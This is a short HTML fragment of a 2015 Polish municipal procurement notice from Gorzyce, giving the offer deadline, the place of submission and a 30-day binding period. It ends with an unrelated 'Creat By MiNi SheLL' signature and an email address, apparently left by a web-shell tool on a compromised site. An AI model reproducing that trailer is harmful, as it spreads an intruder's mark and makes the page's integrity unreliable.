<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.12.2015 godzina 08:00, miejsce: Urząd Gminy w Gorzycach, ul. Kościelna 15, 44-350 Gorzyce, Biuro Obsługi Klienta (parter).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com